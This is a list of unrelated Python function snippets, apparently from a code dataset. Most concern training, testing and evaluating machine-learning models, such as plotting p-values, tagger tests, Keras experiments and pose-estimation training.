axes[i][1].set_ylim(0,1000*(np.max(np.absolute(raw_weights).sum(1))+0.001))\n if i==0:\n axes[i][1].set_title('Absolute SVM weights * 1000', fontsize=22)\n plt.setp(axes[i][1].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][1].get_xticklabels(), fontsize=16)\n\t\t\t\n # Plot COMBI\n plot_pvalues(pvalues_filled_combi, indices_true, axes[i][2])\n if i==0:\n axes[i][2].set_title('COMBI $-log_{10}$(p-values)', fontsize=22)\n if i==2:\n axes[i][2].set_xlabel('SNP position', fontsize=18)\n plt.setp(axes[i][2].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][2].get_xticklabels(), fontsize=16)\n\t\t\t\n # Plot LRP relevance scores\n axes[i][3].scatter(range(len(np.absolute(weights).reshape(-1, 3).sum(1))), np.absolute(weights).reshape(-1, 3).sum(1), marker='.', color='darkblue')\n axes[i][3].scatter(indices_true,np.absolute(weights).reshape(-1, 3).sum(1)[indices_true], color='fuchsia')\n #axes[i][1].legend()\n axes[i][3].set_ylim(0,np.max(np.absolute(weights).reshape(-1, 3).sum(1))+1)\n if i==0:\n axes[i][3].set_title('LRP relevance scores', fontsize=22)\n plt.setp(axes[i][3].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][3].get_xticklabels(), fontsize=16)\n\t\t\t\n # Plot DeepCOMBI\n plot_pvalues(pvalues_filled_deep, indices_true, axes[i][4])\n if i==0:\n axes[i][4].set_title('DeepCOMBI $-log_{10}$(p-value)', fontsize=22)\n plt.setp(axes[i][4].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][4].get_xticklabels(), fontsize=16)\n\t\t\t\n ## Plot distribution of postprocessed vectors\n #axes[i][2].plot(postprocessed_weights)\n #axes[i][2].set_title('Postprocessed relevance')\n\n fig.savefig(os.path.join(IMG_DIR, 'manhattan-example-toy-NAR.png'), bbox_inches='tight')", "def test_model(docs, labels,model, log_writer:LogWriter,test_name):\n stats = []\n topic_indexes, topics_of_index = connect_topic_id_to_topics(model,prep_docs_for_assesment(docs,labels),log_writer)\n 
distribution = []\n for index, article in enumerate(docs):\n analysis_res = model.analyse_text(article)\n if len(analysis_res) == 0:\n print(\"nothing found\")\n continue\n res = max(analysis_res, key=lambda item: item[1])\n if res[0] not in topics_of_index:\n topics_of_index[res[0]] = [labels[index]]\n topic_indexes[labels[index]] = res[0]\n print(\"continuing\")\n continue\n distribution.append(res[0])\n stats.append(1 if labels[index] in topics_of_index[res[0]] else 0)\n # self.log_writer.add_log(\"Article with topic {} was assigned {} with {} certainty.\".format(article[0], \"correctly\" if res[0] == self.topic_positions[article[0]] else \"wrong\", res[1]))\n accuracy = sum(stats) / len(stats)\n log_writer.add_log(\"{} got accuracy {}\".format(test_name,accuracy))\n log_writer.add_log(\"Real distribution was {}\".format(dict(Counter(labels))))\n log_writer.add_log(\"Predicted distribution was {}\".format(dict(Counter(distribution))))\n return accuracy", "def test_bpe_lstm(self, resource_loader):\n config = {\n \"model_type\": \"tagger\",\n \"example_type\": ENTITY_EXAMPLE_TYPE,\n \"label_type\": ENTITIES_LABEL_TYPE,\n \"model_settings\": {\"classifier_type\": \"lstm-pytorch\"},\n \"params\": { # default token_spans_pooling_type is \"first\"\n \"emb_dim\": 30, \"tokenizer_type\": \"bpe-tokenizer\", \"add_terminals\": True\n },\n }\n examples = self.labeled_data.queries()\n labels = self.labeled_data.entities()\n\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"use_crf_layer\": False}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"mean\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"max\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"mean_sqrt\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"last\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {\n **config[\"params\"], \"use_crf_layer\": False, \"token_spans_pooling_type\": \"first\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)", "def run_experiment(model, loss, loss_weights, optimizer = 
keras.optimizers.Adam,\n learning_rate = 0.1, num_epochs = 1, train_dataset:list = None,\n test_dataset:list = None, verbose = 1, log = False):\n train_data = deepcopy(train_dataset)\n test_data = deepcopy(test_dataset)\n\n # should check if data is in dataframes\n try:\n train_data[0] = train_data[0].to_numpy()\n test_data[0] = test_data[0].to_numpy()\n train_data[1] = {k:np.array(v) for k, v in train_data[1].to_dict('list').items()}\n test_data[1] = {k:np.array(v) for k, v in test_data[1].to_dict('list').items()}\n except:\n pass\n\n if log:\n logdir=\"surrogate_models/.logs/\"+ model.name +'_'+ datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)\n\n model.compile(\n optimizer = optimizer(learning_rate=learning_rate),\n loss = loss,\n loss_weights = loss_weights,\n metrics = ['mse'],\n )\n\n print(\"Start training the model {} ...\".format(model.name))\n\n history = model.fit(x = train_data[0], y = train_data[1], epochs=num_epochs,\n validation_data=tuple(test_data), callbacks=[tensorboard_callback],\n verbose = verbose) if log else model.fit(x = train_data[0], y = train_data[1],\n epochs=num_epochs, validation_data=tuple(test_data), verbose = verbose)\n print(\"Evaluating model performance...\")\n\n train_hat = model(train_data[0])\n test_hat = model(test_data[0])\n\n rmse = multi_mse(train_dataset[1], train_hat)\n print(f\"Train MSE: {round(np.sum(rmse)*100, 3)}\")\n\n rmse = multi_mse(test_dataset[1], test_hat)\n print(f\"Test MSE: {round(np.sum(rmse)*100, 3)}\")\n return history", "def run_models(request):\n job_form_data = request.session['job_form_data']\n job_wrapper = JobWrapper(job_form_data)\n job_wrapper.create_data_file()\n print job_wrapper.job_form_data\n # Must run emits to generate emis_co2.dat - this step is requried to\n # run the models and it's a lot simpler to have it run form here than\n # from a job manager script\n cmd = \"/var/opt/IMOGEN/EMITS/emits\"\n subprocess.call(cmd, shell=True)\n print \"Ran {0} program\".format(cmd)\n # Now submit the models via the job manager\n jr = DRMAAJobRunner()\n return jr.queue_job(job_wrapper)", "def __train__(self):\n if (self.type_camf == 'CAMF_CI'):\n #users, items, context, ratings\n ci = camf_ci.CI_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = ci.fit()\n elif (self.type_camf == 'CAMF_CU'):\n cu = camf_cu.CU_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = cu.fit()\n elif (self.type_camf == 'CAMF_C'):\n c = camf_c.C_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = c.fit()\n\n dummy_pred = np.zeros((predictions.shape))\n for r, pred_array in enumerate(predictions):\n for c, pred in enumerate(pred_array):\n dummy_pred[r][c] = self.__check_ratings__(pred)\n predictions = dummy_pred\n #save a plot with a loss function\n plots = prs.PlotRSData()\n #print(losses)\n plots.plot_loss_cars(losses, self.type_camf, self.__save_prefix__+\"_loop\"+str(self.loop))\n pd.DataFrame(losses).to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ +\"losses_loop\"+str(self.loop)+\".csv\")\n print('Saving the feature matrix...')\n # set predictions back to the pivot table\n self.__utility_saved_training__(predictions) \n # save results\n 
self.utility_predictions.to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ + \"_SGD_predictions_loop\"+str(self.loop)+\".csv\")", "def test_fer_model(img_folder, model=\"/path/to/model\"):\n preds = None\n ### Start your code here\n\n if not os.path.exists(model):\n print (\"Model Loading Error: can't find the model.\\n\")\n return None\n\n if not os.path.exists(img_folder):\n print (\"Data Loading Error: can't find the data.\\n\")\n return None\n\n with open(model, 'rb') as model_file:\n model = load(model_file)\n data = load_FER2013_samples(img_folder)\n preds = model.predict(data)\n print (preds)\n ### End of code\n return preds", "def test_model(self, batch_size):\n (_, gen_val, gen_test) = self.dataset.data_loaders(\n batch_size=batch_size,\n split=(0.01, 0.01)\n )\n print('Num Test Batches: ', len(gen_test))\n mean_loss_test, mean_accuracy_test = self.loss_and_acc_test(gen_test)\n print('Test Epoch:')\n print(\n '\\tTest Loss: ', mean_loss_test, '\\n'\n '\\tTest Accuracy: ', mean_accuracy_test * 100\n )", "def process_models(self, models):\n for model in models:\n # already recording it, ignore\n if self.is_recording(model) is True:\n continue\n self.logger.info(\"Model \" + model + \" is chaturbating\")\n info = self.get_model_info(model)\n # if the embed info was scrapped\n if len(info) > 0:\n # check if the show is private\n if self.is_private(info) is False:\n self.capture(info)\n else:\n self.logger.warning(\"But the show is private\")", "def test_predict(self):\n\t\tMY_TEST_MODEL = \"v1_rm500\"\n\t\tx_test = np.genfromtxt(\"tests/data/ensg_input.txt\",delimiter=\"\\t\")\n\t\tquery_localdirs = cancerscope.get_models.findmodel(os.path.dirname(cancerscope.__file__),MY_TEST_MODEL)\n\t\tif query_localdirs is not None:\n\t\t\tmodel_in = query_localdirs[MY_TEST_MODEL]\n\t\telse:\n\t\t\tmodel_in = cancerscope.get_models.downloadmodel(model_label=MY_TEST_MODEL)\n\t\t\n\t\t\"\"\"Compare results with what you get from 'getmodel()'\"\"\"\n\t\tmodeldir_v1_rm500 = cancerscope.get_models.getmodel(model_label = MY_TEST_MODEL)\n\t\tself.assertEqual(modeldir_v1_rm500[MY_TEST_MODEL][MY_TEST_MODEL], model_in)\n\t\t\n\t\t\"\"\"Test prediction\"\"\"\n\t\tlmodel = cancerscope.scopemodel(model_in)\n\t\tlmodel.fit()\n\t\trandom_sample = np.nan_to_num(x_test[0:17688, 1].reshape(1,17688))\n\t\tpred_testX = lmodel.predict(random_sample)[0][0][0]\n\t\tself.assertEqual(pred_testX, \"ESCA_TS\")\n\t\t\n\t\tallpreds_testX = lmodel.predict(random_sample, get_all_predictions=True, get_numeric=False,get_predictions_dict=False)[0]\n\t\tallpredsNumeric_testX = lmodel.predict(random_sample, get_all_predictions=True, get_numeric=True, get_predictions_dict=False)[0]\n\t\t\n\t\tself.assertEqual(len(allpreds_testX), 66)\n\t\tself.assertEqual(len(allpredsNumeric_testX), 66)\n\t\tself.assertEqual(allpreds_testX[0], \"BRCA_TS\")\n\t\tself.assertTrue(isinstance(allpredsNumeric_testX[0], Number))\n\t\t\n\t\t\"\"\"Test if normalization works and is evaluated to correct floatpoint\"\"\"\n\t\tnormalized_testX = lmodel.get_normalized_input(random_sample)[0]\n\t\tself.assertEqual(normalized_testX[0],0.60640558591378269)\t\n\t\t\n\t\t\"\"\"Test if Jacobian is evaluated correctly\"\"\"\n\t\t#Mar19 keras noncompat#jacobian_test = lmodel.get_jacobian(random_sample)\n\t\t#class0_highestjacobian = np.amax(jacobian_test[0,:])\n\t\t#self.assertEqual(jacobian_test.shape[0], 66) ## Num rows = classes\n\t\t#self.assertEqual(jacobian_test.shape[1], 17688) ## Num columns = 
genes\n\t\t#self.assertAlmostEqual(class0_highestjacobian, 0.00012377805544766)\n\t\t#END OF #Mar19 keras noncompat#", "def train():\n\n # Load camera parameters\n rcams = cameras.load_cameras()\n\n # Load 3d data and 2d projections\n full_train_set_3d, full_test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d =\\\n data_utils.read_3d_data( FLAGS.camera_frame, rcams, FLAGS.origin_bc, FLAGS.augment_data,\n FLAGS.procrustes, FLAGS.lowpass )\n \n # Read stacked hourglass 2D predictions\n full_train_set_2d, full_test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = \\\n data_utils.read_2d_predictions( FLAGS.origin_bc, FLAGS.augment_data )\n \n print(\"\\n[+] done reading and normalizing data\")\n # Getting the number of training and test subjects\n tr_subj = 0\n for v in full_train_set_3d.values():\n tr_subj += v.shape[0]\n te_subj = 0\n for v in full_test_set_3d.values():\n te_subj += v.shape[0]\n print(\"{0} training subjects, {1} test subjects\".format(tr_subj, te_subj))\n print(dim_to_use_2d)\n print(dim_to_use_3d)\n # Un-normalizing data for visualizations\n unNorm_ftrs2d = data_utils.unNormalize_dic(full_train_set_2d, data_mean_2d, data_std_2d, dim_to_use_2d)\n unNorm_ftrs3d = data_utils.unNormalize_dic(full_train_set_3d, data_mean_3d, data_std_3d, dim_to_use_3d)\n unNorm_ftes3d = data_utils.unNormalize_dic(full_test_set_3d, data_mean_3d, data_std_3d, dim_to_use_3d)\n # Visualize the data\n viz.visualize_train_sample(unNorm_ftrs2d, unNorm_ftrs3d, FLAGS.camera_frame)\n viz.visualize_files_oneatatime(unNorm_ftrs3d, unNorm_ftes3d)\n\n # Getting only the dimensions to use (get rid of body coxas, other limb, antennas, abdomen\n train_set_3d, train_set_2d, test_set_3d, test_set_2d = {}, {}, {}, {}\n for k in full_train_set_3d:\n (f, c) = k\n train_set_3d[k] = full_train_set_3d[k][:, dim_to_use_3d]\n train_set_2d[(f, data_utils.CAMERA_TO_USE)] =\\\n full_train_set_2d[(f, data_utils.CAMERA_TO_USE)][:, dim_to_use_2d]\n for k in full_test_set_3d:\n (f, c) = k\n test_set_3d[k] = full_test_set_3d[k][:, dim_to_use_3d]\n test_set_2d[(f, data_utils.CAMERA_TO_USE)] =\\\n full_test_set_2d[(f, data_utils.CAMERA_TO_USE)][:, dim_to_use_2d]\n \n print(\"3D data mean:\")\n print(data_mean_3d)\n print(\"3D data std:\")\n print(data_std_3d)\n\n print(\"2D data mean:\")\n print(data_mean_2d)\n print(\"2D data std:\")\n print(data_std_2d)\n \n input(\"Press Enter to continue...\")\n\n # Avoid using the GPU if requested\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n with tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(\n device_count=device_count,\n allow_soft_placement=True )) as sess:\n\n # === Create the model ===\n print(\"[*] creating %d bi-layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model( sess, FLAGS.batch_size )\n model.train_writer.add_graph( sess.graph )\n print(\"[+] model created\")\n \n #=== This is the training loop ===\n step_time, loss, val_loss = 0.0, 0.0, 0.0\n current_step = 0 if FLAGS.load <= 0 else FLAGS.load + 1\n previous_losses = []\n\n step_time, loss = 0, 0\n current_epoch = 0\n log_every_n_batches = 100\n losses, errors, joint_errors = [], [], []\n for _ in range( FLAGS.epochs ):\n current_epoch = current_epoch + 1\n\n # === Load training batches for one epoch ===\n encoder_inputs, decoder_outputs =\\\n model.get_all_batches( train_set_2d, train_set_3d, FLAGS.camera_frame, training=True )\n nbatches = len( encoder_inputs )\n print(\"[*] there are {0} train batches\".format( nbatches ))\n 
start_time, loss = time.time(), 0.\n # === Loop through all the training batches ===\n for i in range( nbatches ):\n\n if (i+1) % log_every_n_batches == 0:\n # Print progress every log_every_n_batches batches\n print(\"Working on epoch {0}, batch {1} / {2}...\".format( current_epoch, i+1, nbatches),end=\"\" )\n\n enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]\n step_loss, loss_summary, lr_summary, _ =\\\n model.step( sess, enc_in, dec_out, FLAGS.dropout, isTraining=True )\n\n if (i+1) % log_every_n_batches == 0:\n # Log and print progress every log_every_n_batches batchespixels = pixels / pixels[2,:]\n model.train_writer.add_summary( loss_summary, current_step )\n model.train_writer.add_summary( lr_summary, current_step )\n step_time = (time.time() - start_time)\n start_time = time.time()\n print(\"done in {0:.2f} ms\".format( 1000*step_time / log_every_n_batches ) )\n\n loss += step_loss\n current_step += 1\n # === end looping through training batches ===\n\n loss = loss / nbatches\n losses.append(loss)\n print(\"=============================\\n\"\n \"Global step: %d\\n\"\n \"Learning rate: %.2e\\n\"\n \"Train loss avg: %.4f\\n\"\n \"=============================\" % (model.global_step.eval(),\n model.learning_rate.eval(), loss) )\n # === End training for an epoch ===\n\n # === Testing after this epoch ===\n isTraining = False\n \n n_joints = len(data_utils.DIMENSIONS_TO_USE)\n if FLAGS.origin_bc:\n n_joints -= len(data_utils.ROOT_POSITIONS)\n\n encoder_inputs, decoder_outputs =\\\n model.get_all_batches( test_set_2d, test_set_3d, FLAGS.camera_frame, training=False)\n\n total_err, coordwise_err, joint_err, step_time, loss = evaluate_batches( sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n current_step, encoder_inputs, decoder_outputs, current_epoch )\n\n print(\"=============================\\n\"\n \"Step-time (ms): %.4f\\n\"\n \"Val loss avg: %.4f\\n\"\n \"Val error avg (mm): %.2f (%.2f, %.2f, %.2f)\\n\"\n \"=============================\" % ( 1000*step_time, loss, total_err,\n coordwise_err[0], coordwise_err[1], coordwise_err[2] ))\n\n for i in range(n_joints):\n # 6 spaces, right-aligned, 5 decimal places\n print(\"Error in joint {0:02d} (mm): {1:>5.2f}\".format(i+1, joint_err[i]))\n print(\"=============================\")\n errors.append(coordwise_err)\n joint_errors.append(joint_err)\n # Log the error to tensorboard\n summaries = sess.run( model.err_mm_summary, {model.err_mm: total_err} )\n model.test_writer.add_summary( summaries, current_step )\n\n # Save the model\n print( \"Saving the model... 
\", end=\"\" )\n start_time = time.time()\n model.saver.save(sess, os.path.join(train_dir, 'checkpoint'), global_step=current_step )\n print( \"done in {0:.2f} ms\".format(1000*(time.time() - start_time)) )\n\n # Reset global time and loss\n step_time, loss = 0, 0\n\n sys.stdout.flush()\n # Save losses for future plots\n def print_list_tofile(l, filename):\n with open(filename, 'wb') as f:\n pickle.dump(l, f)\n print_list_tofile(losses, train_dir+\"/losses.pkl\")\n print_list_tofile(errors, train_dir+\"/errors.pkl\")\n print_list_tofile(joint_errors, train_dir+\"/joint_errors.pkl\")", "def main(domain):\n\n filepath_train1 = '../../Non_covid_data_15oct/train_data_batch1_disregard_removed.pkl'\n filepath_test1 = '../../Non_covid_data_15oct/test_data_batch1_disregard_removed.pkl'\n filepath_train2 = '../../Covid_data_11nov/traindata_covidbatch.pkl'\n filepath_test2 = '../../Covid_data_11nov/testdata_covidbatch.pkl'\n\n df_train_nc, df_test_nc = createDataframe(filepath_train1, filepath_test1, domain, 'noncovid')\n df_train_c, df_test_c = createDataframe(filepath_train2, filepath_test2, domain, 'covid')\n #print(df_train)\n sen_reps_tr_nc, labels_tr_nc, sen_reps_te_nc, labels_te_nc = prepro(df_train_nc, df_test_nc)\n sen_reps_tr_c, labels_tr_c, sen_reps_te_c, labels_te_c = prepro(df_train_c, df_test_c)\n #print(labels_te)\n\n #Uncomment to combine training datasets \n #sen_reps_tr_c += sen_reps_tr_nc\n #labels_tr_c += labels_tr_nc\n\n #Uncomment to combine test datasets and test labels if necessary (if you do so, also combine test df's)\n #sen_reps_te_c += sen_reps_te_nc\n #labels_te_c += labels_te_nc\n #df_test = pd.concat([df_test_c, df_test_nc])\n\n #Feed selected train and test data to regression model\n predictions = get_predictions(sen_reps_tr_c, labels_tr_c, sen_reps_te_c)\n\n #Make dataframes of note id's and labels\n df_ann = make_note_df(df_test_c, labels_te_c)\n df_pred = make_note_df(df_test_c, predictions)\n\n #Evaluate on sentence level\n MSE, MAE, RMSE = evaluation(labels_te_c, predictions)\n\n print(\"MSE \"+domain, MSE)\n print(\"MAE \"+domain, MAE)\n print(\"RMSE \"+domain, RMSE)\n\n #Aggregate per note\n means_ann = means(df_ann)\n means_pred = means(df_pred)\n\n #Evaluate on note level\n MSE, MAE, RMSE = evaluation(means_ann, means_pred)\n\n print(\"MSE agg\"+domain, MSE)\n print(\"MAE agg\"+domain, MAE)\n print(\"RMSE agg\"+domain, RMSE)", "def test_infer_framework(self):\n\t\t\n\t\tprint(f\"test_infer_framework self.model={self.model}\")\n\t\t\n\t\tnum_files = len(glob.glob(f\"{self.model}/*\"))\n\t\tprint(f\"test_infer_framework found {num_files} tmp files\")\n\t\tself.assertTrue(num_files > 0)\n\t\t\n\t\t\n\t\tnum_pytorch_bin_files = len(glob.glob(f\"{self.model}/*bin\"))\n\t\t#print(f\"test_infer_framework found {num_pytorch_bin_files} tmp pytorch bin files\")\n\t\tself.assertEqual(num_pytorch_bin_files, 0)\n\t\t\n\t\tnum_safetensors_files = len(glob.glob(f\"{self.model}/*safetensors\"))\n\t\t#print(f\"test_infer_framework found {num_pytorch_bin_files} tmp num_safetensors_files files\")\n\t\tself.assertEqual(num_safetensors_files, 1)\n\t\t\n\t\tnum_flat_files = len(glob.glob(f\"{self.model}/*npy\"))\n\t\t#print(f\"test_infer_framework found {num_files} tmp npy flat files\")\n\t\tself.assertEqual(num_flat_files, 0)\n\t\t\n\t\texpected_format, expected_fileglob = ww.WeightWatcher.infer_model_file_format(self.model)\n\t\tprint(f\"infer_model_file_format found {expected_format} expected format\")\n\t\tself.assertEqual(expected_format, 
MODEL_FILE_FORMATS.SAFETENSORS)\t\t\n\n\t\texpected_framework = ww.WeightWatcher.infer_framework(self.model)\n\t\tprint(f\"infer_model_file_format found {expected_framework} expected_framework \")\n\t\tself.assertEqual(expected_framework, FRAMEWORK.PYSTATEDICT_DIR)\t\n\t\t\n\t\treturn", "def run_tests():\r\n source1 = TextModel('50 Shades of Gray')\r\n source1.add_file('50.txt')\r\n \r\n print()\r\n \r\n source2 = TextModel('King James Version of the Bible')\r\n source2.add_file('kjv.txt')\r\n\r\n print()\r\n\r\n new1 = TextModel('Shakespeare')\r\n new1.add_file('shake.txt')\r\n new1.classify(source1, source2)\r\n \r\n print()\r\n \r\n new2 = TextModel('JK Rowling')\r\n new2.add_file('hp.txt')\r\n new2.classify(source1, source2)\r\n \r\n print()\r\n \r\n new3 = TextModel('Breitbart News Network')\r\n new3.add_file('bnn.txt')\r\n new3.classify(source1, source2)\r\n \r\n print()\r\n \r\n new4 = TextModel('Chaucer')\r\n new4.add_file('tct.txt')\r\n new4.classify(source1, source2)", "def test_models_multiclass(model):\n atom = ATOMClassifier(X_class2, y_class2, test_size=0.24, random_state=1)\n atom.run(\n models=model,\n metric=\"f1_micro\",\n n_calls=2,\n n_initial_points=1,\n bo_params={\"base_estimator\": \"rf\", \"cv\": 1},\n )\n assert not atom.errors\n assert hasattr(atom, model)", "def test_model():\n pass", "def train_model(\r\n train_x: pd.DataFrame,\r\n train_y: pd.DataFrame,\r\n parameters: Dict[str, Any]\r\n) -> sklearn_Pipeline:\r\n # Build a multi-class logistic regression model\r\n model_params = parameters['model_params']\r\n model = LogisticRegression(**model_params)\r\n\r\n if parameters['model_standard_scaler']:\r\n # Prepare column transformer to do scaling\r\n col_transformer = ColumnTransformer(\r\n [\r\n (\r\n 'standard_scaler',\r\n StandardScaler(copy=False),\r\n [\r\n \"sepal_length\",\r\n \"sepal_width\",\r\n \"petal_length\",\r\n \"petal_width\",\r\n ],\r\n ),\r\n ],\r\n remainder='drop',\r\n )\r\n\r\n # Make pipeline w/ scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('col_transformer', col_transformer),\r\n ('model', model),\r\n ]\r\n )\r\n else:\r\n # Make pipeline w/o scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('model', model),\r\n ]\r\n )\r\n\r\n # Fit\r\n model_pipeline.fit(train_x, train_y)\r\n\r\n mlflow.set_experiment('iris-example')\r\n mlflow_sklearn.log_model(sk_model=model_pipeline, artifact_path=\"model\")\r\n mlflow.log_params(model_params)\r\n\r\n # Print out the model pipeline\r\n # See: http://www.xavierdupre.fr/app/mlinsights/helpsphinx/notebooks/visualize_pipeline.html\r\n dot = pipeline2dot(model_pipeline, train_x)\r\n dot_filename = 'pipeline_dot.dot'\r\n with open(dot_filename, 'w', encoding='utf-8') as f:\r\n f.write(dot)\r\n if sys.platform.startswith(\"win\") and \"Graphviz\" not in os.environ[\"PATH\"]:\r\n os.environ['PATH'] = os.environ['PATH'] + r';C:\\Program Files (x86)\\Graphviz2.38\\bin'\r\n cmd = \"dot -G=300 -Tpng {0} -o{0}.png\".format(dot_filename)\r\n run_cmd(cmd, wait=True, fLOG=print)\r\n mlflow.log_artifact('{0}.png'.format(dot_filename), 'model')\r\n\r\n return model_pipeline", "def test_model_processor():\n global model_processor_called\n\n model_str = 'first 34 45 7 A 45 65 B true C \"dfdf\"'\n\n metamodel = metamodel_from_str(grammar)\n metamodel.register_model_processor(model_processor)\n\n metamodel.model_from_str(model_str)\n\n assert model_processor_called", "def run(self, df: pd.DataFrame, model: Any):\n print(f'Running cross validation with the following model:\\n{model}')\n\n 
df['timestamp'] = pd.to_datetime(df['timestamp'])\n\n date_1 = datetime.datetime(year=2016, month=1, day=1)\n date_2 = datetime.datetime(year=2016, month=4, day=1)\n date_3 = datetime.datetime(year=2016, month=7, day=1)\n date_4 = datetime.datetime(year=2016, month=10, day=1)\n date_5 = datetime.datetime(year=2017, month=1, day=1)\n\n summaries: List[FoldSummary] = []\n\n for train_start, train_end, test_start, test_end in [\n (date_1, date_2, date_2, date_3),\n # (date_1, date_3, date_3, date_4),\n # (date_1, date_4, date_4, date_5)\n ]:\n print('Calculating train and test datasets')\n train_df = df[(df['timestamp'] >= train_start) & (df['timestamp'] < train_end)]\n test_df = df[(df['timestamp'] >= test_start) & (df['timestamp'] < test_end)]\n\n columns = list(train_df.columns)\n columns.remove('timestamp')\n columns.remove('meter_reading')\n\n print(columns)\n\n train_data = train_df[columns]\n test_data = test_df[columns]\n\n print(f'Fitting the model on train dataset of size {len(train_data)}')\n model.fit(train_data, train_df['meter_reading'])\n print(f'Predicting for test dataset of size {len(test_data)}')\n predictions = model.predict(test_data)\n\n score = self._calculate_score(predictions, test_df['meter_reading'])\n print(f'Score: {score}')\n\n summaries.append(FoldSummary(\n train_start=train_start,\n train_end=train_end,\n test_start=test_start,\n test_end=test_end,\n score=score\n ))\n\n filename = f'../resources/runs/{time.time()}.txt'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w+') as f:\n f.write(f'{model.__class__.__name__}\\n')\n f.write(f'{str(model.get_params())}\\n')\n for summary in summaries:\n f.write(f'Summary (\\n'\n f'\\ttrain start: {summary.train_start}\\n'\n f'\\ttrain end: {summary.train_end}\\n'\n f'\\ttest start: {summary.test_start}\\n'\n f'\\ttest end: {summary.test_end}\\n'\n f'\\tscore: {summary.score}\\n'\n f')\\n')\n\n print(summaries)\n\n return model", "def test(model_params, dataset_test, testing_params, log_directory, device, cuda_available=True,\n metric_fns=None):\n # DATA LOADER\n test_loader = DataLoader(dataset_test, batch_size=testing_params[\"batch_size\"],\n shuffle=False, pin_memory=True,\n collate_fn=imed_loader_utils.imed_collate,\n num_workers=0)\n\n # LOAD TRAIN MODEL\n fname_model = os.path.join(log_directory, \"best_model.pt\")\n print('\\nLoading model: {}'.format(fname_model))\n model = torch.load(fname_model, map_location=device)\n if cuda_available:\n model.cuda()\n model.eval()\n\n # CREATE OUTPUT FOLDER\n path_3Dpred = os.path.join(log_directory, 'pred_masks')\n if not os.path.isdir(path_3Dpred):\n os.makedirs(path_3Dpred)\n\n # METRIC MANAGER\n metric_mgr = imed_metrics.MetricManager(metric_fns)\n\n # UNCERTAINTY SETTINGS\n if (testing_params['uncertainty']['epistemic'] or testing_params['uncertainty']['aleatoric']) and \\\n testing_params['uncertainty']['n_it'] > 0:\n n_monteCarlo = testing_params['uncertainty']['n_it']\n testing_params['uncertainty']['applied'] = True\n print('\\nComputing model uncertainty over {} iterations.'.format(n_monteCarlo))\n else:\n testing_params['uncertainty']['applied'] = False\n n_monteCarlo = 1\n\n for i_monteCarlo in range(n_monteCarlo):\n preds_npy, gt_npy = run_inference(test_loader, model, model_params, testing_params, path_3Dpred,\n cuda_available, i_monteCarlo)\n metric_mgr(preds_npy, gt_npy)\n\n # COMPUTE UNCERTAINTY MAPS\n if n_monteCarlo > 1:\n imed_utils.run_uncertainty(ifolder=path_3Dpred)\n\n metrics_dict = metric_mgr.get_results()\n 
metric_mgr.reset()\n print(metrics_dict)\n return metrics_dict", "def __test_similarity(self):\n\n _, test_loader, _ = create_loaders()\n\n false_counter = 0\n for (image, labels) in test_loader:\n\n output_pytorch = self._model(image).detach().numpy()\n\n im = image.numpy().flatten()\n output_manual = self.run_through_model(im)\n\n if np.allclose(output_pytorch, output_manual, rtol=1e-4, atol=1e-4) is not True:\n false_counter += 1\n\n print(f\"Number of mistakes: {false_counter}\")", "def test_shap_contributions_1(self):\n for model in self.modellist:\n print(type(model))\n model.fit(self.x_df, self.y_df)\n if str(type(model)) in simple_tree_model:\n explainer = shap.TreeExplainer(model)\n\n elif str(type(model)) in catboost_model:\n explainer = shap.TreeExplainer(model)\n\n elif str(type(model)) in linear_model:\n explainer = shap.LinearExplainer(model, self.x_df)\n\n elif str(type(model)) in svm_model:\n explainer = shap.KernelExplainer(model.predict, 